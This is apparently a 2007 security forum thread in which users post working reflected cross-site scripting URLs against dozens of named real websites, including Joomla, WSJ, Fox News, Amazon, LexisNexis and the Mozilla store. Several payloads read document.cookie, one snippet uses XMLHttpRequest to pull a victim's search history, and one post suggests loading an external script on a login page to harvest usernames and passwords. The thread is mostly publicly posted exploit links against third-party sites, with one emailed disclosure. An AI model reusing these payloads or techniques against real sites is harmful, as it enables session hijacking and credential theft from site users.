Kind of a cool fragmented xss thing here. The searchword variable is limited at 20 characters; the searchphrase variable isn't limited (afaik) but ' is escaped as \', hence fragmenting: http://demo.joomla.org/demo10/index.php?searchword=%27%3B/*&searchphrase=*/alert%28document.cookie%29%3B//&option=com_search

alerts from the <select> (name=limit class=inputbox) box when the onchange event occurs.
Affects Joomla 1.0.* (current is 1.0.12)

-tx @ lowtech-labs.org



Edited 3 time(s). Last edit at 07/21/2007 12:48AM by tx.

station.sony.com


[www.station.sony.com]

http://www.timesonline.co.uk/tol/sitesearch.do?query=%22;alert('xss');//&hitsperpage=10&jumpToPrevious=0&mode=SIMPLE&nextOffset=0&offset=0&leftStartIndex=1&leftEndIndex=10&jumpToPrevious=0&mode=SIMPLE&submitStatus=searchFormSubmitted&sectionId=2820&x=0&y=0

http://publish.vx.roo.com/thedaily/videoplayer/?channel=Movies&clipid=%27%3Balert%28%27xss%27%29%3B//

http://www.nypost.com/search/search.htm?q=%3Cscript%3Ealert('xss');%3C/script%3E&s=news&t=0

http://online.wsj.com/public/search/page/3_0466.html?KEYWORDS=%3C/script%3E%3Cscript%3Ealert(String.fromCharCode(88,83,83));%3C/script%3E%3C!--&imageField.x=0&imageField.y=0

http://search2.foxnews.com/search?ie=UTF-8&oe=UTF-8&client=my_frontend&proxystylesheet=my_frontend&output=xml_no_dtd&site=story&getfields=*&filter=0&sort=date:D:S:d1&q=%3C/script%3E%3Cscript%3Ealert('xss');%3C/script%3E

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/28/2007 08:19PM by tx.

Pownce.com: http://www.whiteacid.org/misc/xss_post_forwarder.php?xss_target=http://pownce.com/forgot/&email=%3Cscript%3Ealert('xss')%3B%3C%2Fscript%3E

-tx @ lowtech-labs.org

more ethicalhacker.net (this is still not fixed btw http://sla.ckers.org/forum/read.php?3,44,12928#msg-12928):

had to do a little evasion for the filter and mod_rewrite stuff
http://www.ethicalhacker.net/component/option,com_smf/Itemid,54'%22%3E%3Cscript%08%3Ealert(%22xss%22)%3C/script%08%3E/script%3E,666/topic,1584.0/

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 08/14/2007 03:49AM by tx.

http://list.research.microsoft.com/scripts/lyris.pl?enter=%3Cimg%20src%20onerror=%22alert('xss');%22%3E&text_mode=&lang=english

-tx @ lowtech-labs.org

http://blog.meebo.com/?year=%3C/title%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

http://k2.gamespress.com/search.asp?x=-1&string=%22%3E%3Cscript%3Ealert('xss');%3C/script%3E%3C!&orig=Search%2bpress%2bcenter&subject=&publisher=&date=&search=-1

EDIT:
http://www.ooorgle.com/component/option,com_remository/Itemid,36%22%3E%3Cscript%08%3Ealert(%22xss%22)%3C/script%08%3E/script%3E,666
http://www.ooorgle.com/component/option,com_remository/Itemid,36/func,select/id,4%22%3E%3Cscript%08%3Ealert(%22xss%22)%3C/script%08%3E/script%3E,666

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 08/21/2007 03:32PM by tx.

http://www.washington.org/index.cfm?blnNavView=True&idContentType=429&idCurrentPage='%22%3E%3Cscript%3Ealert(1)%3C/script%3E

http://www.download.com/sort/3140-2001_4-0-1-3.html?gfiletype=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E

- Kyran

http://www.amazon.com/gp/daily/ref=%22/%3E%3Cscript%3Ealert('XSS%20$4.99%20+%20S&H')%3C/script%3E

- Kyran

http://www.asmallworld.net/publicpages/jobs.php?seltab=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3B%3C/script%3E%5D%21%3E%3C%21%5B

-tx @ lowtech-labs.org

http://mystuff.ask.com/mysearch/DisplaySearchesHome?sort=%22%29%7D%3C%2F%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%58%53%53%22%29%3C%2F%73%63%72%69%70%74%3E&t=images

(script src tags +
xmlhttp = new XMLHttpRequest();xmlhttp.open("GET"," http://mystuff.ask.com/mysearch/DisplaySearchesHome?t=history&sort=dedate",true);xmlhttp.onreadystatechange=function() {if (xmlhttp.readyState==4) {mine=(xmlhttp.responseText);parse()}};xmlhttp.send(null)
for the most 'fun')

http://www.search.org/search/default.asp?yider=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E

http://www.brainboost.com/search.asp?Q=%22%3E%3C%2Ftitle%3E%3C%2Fscript%3E%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&Submit=ask
[3-in-1 - each alert is actually a separately exploited flaw]

[edit to remove previously found exploits]



Edited 3 time(s). Last edit at 08/22/2007 06:18PM by wrayal.

@wrayal: Please be sure to do a search before submitting. Both the search.lycos.com and www.hotbot.com issues have already been disclosed in this thread.

-tx @ lowtech-labs.org

Ministry of External Affairs, India

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Here's a bunch at once...

http://playwithyourmind.com/online-games.php?category=%3Cscript%3Ealert(1)%3C/script%3E
http://shoplinc.com/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.tasteofnovascotia.com/recipe_directory/search.php?letter=%3Cscript%3Ealert(1)%3C/script%3E
http://www.webmarketinfo.com/search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://bondagegirls.org/1/search.php?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://sierraactivist.org/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://rpms.mandrivaclub.com/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.suche4free.de/search.php?query=%22%3E%3Cscript%3Ealert%2814444324224%29%3C%2Fscript%3E
http://www.diyzone.net/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.popcultureshock.com/timm/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.xtra-ppc.com/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://google.pocetnastrana.com/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.s-it.lt/search/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.roxter.pl/search.php?query=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&region=1&page=
http://www.search.bg/search.php?query=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&x=0&y=0
http://api.cakephp.org/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://trailfire.com/pages/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://xmlsoft.org/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://hledani.tiscali.cz/news/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.iconcrawler.com/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://mskd.ru/isearch.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.notefish.com/search.php?st=tag&query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.searchsystems.net/search.php?SEARCH=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&TYPE=2&LIMIT=25
http://www.egosurf.org/search.php?search=%3Cscript%3Ealert(1)%3C/script%3E
http://www.eed.usv.ro/news/search.php?query=%22%3E%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttp%3A//google.com%22%3E
http://www.luckyscafe.com/search.php?query=%22%3E%22%3E%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3Burl%3Dhttp%3A//google.com%22%3E
http://www.myspacelayoutspy.com/search.php?cat=car&query=%3Cscript%3Ealert(1)%3C/script%3E
http://minkaku.goga.co.jp/search.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.theknowledge-brokers.com/find/search.php?type=or&search=1&results=20&query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.researchsea.com/html/experts.php?query=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.p2gems.org/index.php?action=search&search=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://search.jongo.com/searchAll.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.franksicons.com/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.electionguide.org/news-search.php?country=125&year=any&keyword=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submitted=1&submit.x=0&submit.y=0&submit=Search
http://www.noah-health.org/search/results.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.ajfca.org/gallery/search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.uoresources.com/search.php?search_term=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&shard=Atlantic
http://win-big-prizes.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://searchnetfast.info/webtrue/search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://netinfofirst.info/inftrue/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://meganetsearch.info/infsite/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://www.surfnetkids.com/related.php?t=%3Cscript%3Ealert(1)%3C/script%3E&c=/wordsearch.htm
http://www.podcastdirectory.com/search/showword.php?search=%3Cscript%3Ealert(1)%3C/script%3E
http://www.drugs.com/search.php?searchterm=%22%3E%3Cscript%3Ealert(1)%3C/script%3E&is_main_search=1
http://www.girmantas.com/photogallery/search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://www.richardhumphrys.com.au/stock/search.php?keyword=%3Cscript%3Ealert(1)%3C/script%3E
http://qwsa.biz/search.php?q=%22%3E%3Cscript%3Ealert%281%29%3C/script%3E
http://www.searchmechanism.com/search/search.php?said=1973&sbox=1&qq=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Start+Search+Mechanism
http://www.gvla.org/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://www.lufee.com/lufee.php?f=lumrix-search&v=&lufee=&k=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://www.dreamwork.eu/index.php?s=%3Cscript%3Ealert(1)%3C/script%3E
http://www.chcf.org/error/index.cfm?eurl=%3Cscript%3Ealert(1)%3C/script%3E
http://www.searchsystems.net/search.php?SEARCH=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&TYPE=2&LIMIT=25
http://www.synergymx.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://alvares.name/searchform.php?msg=%3Cscript%3Ealert(1)%3C/script%3E
http://smartphone.mobiletopsoft.com/search.php?querywords=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.foreclosuredataonline.com/listings.php?county='%3Cscript%3Ealert(1)%3C/script%3E
http://www.spinblessing.com/search.php?Query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.edrugsearch.com/web.php?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&d=&qty=
http://www.dalbani.co.uk/search.php?case=prefix&by=name&limit=25&q=%3Cscript%3Ealert(1)%3C/script%3E
http://www.deborahrenshaw.com/search.php?q=%3Cscript%3Ealert(1)%3C/script%3E
http://www.geometry.net/cgi-bin/988.cgi?q=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
http://seekxml.com/search.php?query=%3Cscript%3Ealert(1)%3C/script%3E
http://www.oeffa.org/alphasearch.php?alpha=%3Cscript%3Ealert(1)%3C/script%3E
http://www.beinggirl.co.in/main/re_searchrestest.php?search=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
http://www.top40-charts.com/pedia.php?title=Special:Search/%3Cscript%3Ealert(1)%3C/script%3E
http://www.olshan.com/search.php?str=%3Cscript%3Ealert(1)%3C/script%3E
http://www.foreclosure1.com/lview.php?county_name=%3Cscript%3Ealert(1)%3C/script%3E
http://julian.hoosierroots.com/search.php?surname=%3Cscript%3Ealert(1)%3C/script%3E&lnqualify=equals&mybool=AND
http://www.dorilynterrace.com/search.php?search=%3Cscript%3Ealert(1)%3C/script%3E
http://www.stga.co.uk/search.php?language=-1&region=-1&name=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&submit=Search+for+guides

13337.org

[www.blackplanet.com]

http://www.lexisnexis.com/search/Results1.asp?redirect&s=1&target=%0a%0d%3Cscript%3Ealert%28%27xss%27%29%3B%3C/script%3E

http://www.lexisnexis.com/search/Results1.asp?datasections=&query=<script>alert('xss');</script>&Go.x=0&Go.y=0&Go=Get+Answers Javascript only executes once the user follows one of the Category links on the left

-tx @ lowtech-labs.org

Didn't they have a breach, and the FTC sued them? or was that card systems that got sued by them? If so you would think they would be more security aware by now.

Oh, this is glorious- gave me a laugh at least =P
This one's for you, RSnake... you can probably guess: http://www.bordersstores.com/search/title_detail.jsp?id=56783606&srchTerms=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E%3Cx%20x=%22&mediaType=1&srchType=Keyword

-Dan



Edited 1 time(s). Last edit at 08/29/2007 11:50PM by DoctorDan.

hxxp://econ.worldbank.org/external/default/main?menuPK=51515855&pagePK=64256479&piPK=64165424&q='"><script>alert('x')</script>&theSitePK=469372
[www.youare.tv]

- site also allows javascript in your profile: [www.youare.tv]

I am just learning this xss stuff so there is probably alot more you could do with this



Edited 1 time(s). Last edit at 09/01/2007 08:26AM by skpx.

Another fragmented vector for Joomla (i'd demonstrate it on demo.joomla.org, but they took it down when it got pwnd.)
http://www.salvagedata.com/index.php?option=com_search&Itemid=248&searchword=%22%3E%3C%21%5B&submit=Search&searchphrase=any&ordering=%5D%21%3E%3Cscript%09%3Ealert%28%27xss%27%29%3B%3C/script%3E%3C%21

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 09/03/2007 05:07PM by tx.

[mycroft.mozdev.org]

http://www.zonealarm.com/store/content/catalog/products/sku_list_zaas.jsp;jsessionid=GdKmp20qkkLsvx8EpnK1zpyCKN3yl8KWSfXK0Er2X7fKYXT244OF!-82891113!-1062696904!7551!7552!NONE?dc=34std&ctry=&lang=<script>alert('boo')</script>

Hope this wasn't posted before.

Small joke: I make that xss in the "Spyware protection" area of the site.

http://www.thelink.co.uk/index.php?page=searchresult&sTypeSearch=searchMobile&search_universe=1&aSearchCritere=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E

The exploited variable has a limit to its length (39 I believe). But...the site has a login page. Use XSS + an external script and you fish out a lot of usernames and passwords.

[search.who.int]
[search.netscape.com]
[www.gecube.com]

So I emailed mozilla customer service with an XSS hole, and this was their response.
Mozilla store XSS

--------------------------------------------------------------------------------

Sent: 9/1/2007
To: Customer Service
Subject: Re: General

Hi, I thought you would like to know there is a cross site scripting
vulnerability in your webstore. The code parameter is not sanitized before
being used on the page. Reference my example. Please contact me and let me
know how you deal with these issues.
http://store.mozilla.org/product.php?code=mz1303223%22%3E%3Cscript%3Ealert(1)%3C/script%3E&catid=&offset=0

RESPONSE:

Dear ,

Thank you for your inquiry. From the message that was received, I was not able
to discern your question. Please reply to this message with your concern, or
you can reach me by phone at 888-738-4300.

Best Regards,

Tia Vandersnick
Customer Service
GatewayCDI
909 North 20th Street
Saint Louis, MO 63106
314-535-1888 ext. 301
tia.vandersnick@gatewaycdi.com
www.gatewaycdi.com
BUILD YOUR BRAND

You forgot to add question marks. Most people don't need those to derive questions from a sentence but some people aren't that.. dynamic.

Your xss is fixed though.

http://www.aimpages.com/.resource/pictures?t=accountname&id=';alert(document.cookie);x='s

(you dont have to replace "accountname")

i need any expert here to find Xss flaw in my friend website. www.stonemaster.biz . Please full disclose here. Thx in advance